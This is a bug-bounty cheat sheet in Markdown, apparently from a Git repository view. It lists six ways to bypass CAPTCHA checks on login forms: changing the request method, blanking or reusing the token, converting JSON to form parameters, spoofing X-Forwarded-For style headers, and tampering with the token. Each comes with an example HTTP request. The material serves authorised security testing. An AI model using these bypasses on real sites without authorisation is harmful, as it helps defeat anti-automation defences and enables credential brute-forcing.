AllAboutBugBounty/Bypass/Bypass Captcha.md

78 lines
1.5 KiB
Markdown
Raw Normal View History

# Bypass Captcha (Google reCAPTCHA)
2022-06-15 10:38:42 +00:00
1. Try changing the request method, for example POST to GET
```
POST / HTTP 1.1
Host: target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
Change the method to GET
```
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: target.com
...
```
2. Try remove the value of the captcha parameter
```
POST / HTTP 1.1
Host: target.com
...
_RequestVerificationToken=&_Username=daffa&_Password=test123
```
3. Try reuse old captcha token
```
POST / HTTP 1.1
Host: target.com
...
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
```
4. Convert JSON data to normal request parameter
```
POST / HTTP 1.1
Host: target.com
...
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
```
Convert to normal request
```
POST / HTTP 1.1
Host: target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
5. Try custom header to bypass captcha
```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
```
2021-02-02 09:51:10 +00:00
6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.
```
POST / HTTP 1.1
Host: target.com
...
2021-02-02 09:51:10 +00:00
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
Try this to bypass
```
POST / HTTP 1.1
Host: target.com
...
2021-02-02 09:51:10 +00:00
_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
```